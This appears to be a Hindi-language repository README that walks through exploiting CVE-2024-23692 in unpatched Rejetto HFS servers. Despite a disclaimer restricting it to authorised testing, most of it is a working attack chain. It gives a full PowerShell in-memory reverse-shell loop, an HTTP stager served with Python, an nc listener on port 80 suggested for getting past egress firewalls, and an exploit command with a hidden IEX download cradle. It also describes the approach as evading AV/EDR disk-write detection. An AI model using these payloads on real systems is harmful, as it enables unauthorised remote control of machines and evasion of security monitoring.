
CVE-2024-23692 के शोषण को बिना पैच किए Rejetto HFS के विरुद्ध स्वचालित करता है, जिसमें इन-मेमोरी PowerShell रिवर्स शेल, HTTP पेलोड स्टेजिंग, और अधिकृत रेड-टीम अभियानों के लिए AV/EDR डिस्क-राइट से बचाव शामिल है।
CVE-2024-23692 के लिए एक रणनीतिक दस्तावेज़ीकरण और एक्सप्लॉइट गाइड, जो Rejetto HTTP File Server (HFS) के 2.3m से पहले के संस्करणों को प्रभावित करने वाली एक अनऑथेंटिकेटेड गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। यह गाइड सिग्नेचर-आधारित एंटीवायरस/EDR डिस्क-राइटिंग डिटेक्शन से सफलतापूर्वक बचने के लिए इन-मेमोरी रिवर्स शेल (केवल RAM) तकनीक का उपयोग करती है।
अस्वीकरण: यह रिपॉज़िटरी और इसकी सामग्री सख्ती से केवल अधिकृत सुरक्षा मूल्यांकन, पेनेट्रेशन टेस्टिंग एंगेजमेंट, बग बाउंटी सिमुलेशन और डिफेंसिव फोरेंसिक ऑडिटिंग के लिए है। तीसरे पक्ष के वातावरण के विरुद्ध अनधिकृत उपयोग सख्ती से अवैध है।
इस प्रूफ-ऑफ-कॉन्सेप्ट वर्कफ़्लो में लागू ऑटोमेशन चेकिंग टेम्पलेट निम्नलिखित द्वारा विकसित सार्वजनिक रिपॉज़िटरी पर आधारित है:
यह विधि लक्ष्य वातावरण में गतिशील रूप से एक टेक्स्ट-आधारित पेलोड स्ट्रिंग पहुँचाने के लिए HTTP स्टेजर डिप्लॉयमेंट मॉडल को शामिल करती है, जो सिस्टम की वोलेटाइल मेमोरी (RAM) से सीधे लाइव एक्ज़ीक्यूशन को आमंत्रित करती है।
अपने स्थानीय C2/हमलावर सर्वर पर, index.html नाम की एक स्टैटिक टेक्स्ट फ़ाइल बनाएँ और इसे निम्नलिखित मुख्य PowerShell TCP Socket लूप कोड से भरें:
\$c = New-Object System.Net.Sockets.TCPClient('<LHOST>',80);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){;\$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i);\$sb = (iex \$d 2>&1 | Out-String );\$sb2 = \$sb + 'PS ' + (pwd).Path + '> ';\$sbt = ([text.encoding]::ASCII).GetBytes(\$sb2);\$s.Write(\$sbt,0,\$sbt.Length);\$s.Flush()};\$c.Close()
अपनी पेलोड टेम्पलेट फ़ाइल वाले निर्दिष्ट स्टेजिंग फ़ोल्डर के अंदर एक टर्मिनल इंस्टेंस खोलें, फिर एक वैकल्पिक पोर्ट (जैसे, 8080) पर तत्काल एक Python HTTP लिसनर लॉन्च करें:
python3 -m http.server 8080
आने वाले पर्सिस्टेंट शेल कॉलबैक को होस्ट करने के लिए एक द्वितीयक स्वतंत्र टर्मिनल सत्र खोलें। आउटबाउंड पेरिमीटर सुरक्षा उपायों (Egress Firewall Filtering) को आसानी से दरकिनार करने के लिए पोर्ट 80 (या 443) का उपयोग करने की अत्यधिक अनुशंसा की जाती है:
sudo nc -lvnp 80
अपने डिप्लॉयमेंट इन्फ्रास्ट्रक्चर को लक्षित करते हुए ऑटोमेटेड वैलिडेशन इंजन को फायर करें। लक्ष्य कॉल पैरामीटर फ़्लैग को छोड़े बिना इष्टतम स्ट्रिंग स्थिरता बनाए रखने के लिए एक स्थानीयकृत CMD एक्ज़ीक्यूशन रैपर के माध्यम से कमांड पार्सिंग को हुक करता है:
./CVE-2024-23692.sh http://<TARGET_IP>:<PORT> "cmd /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>')\""

समझौतों को पूरी तरह से समाप्त करने और कमजोर परिचालन वातावरण का उपचार करने के लिए:
Get-Process -Name *hfs* | Stop-Process -Force
Remove-Item -Path "C:\Users\Public\*.exe" -Force -ErrorAction SilentlyContinue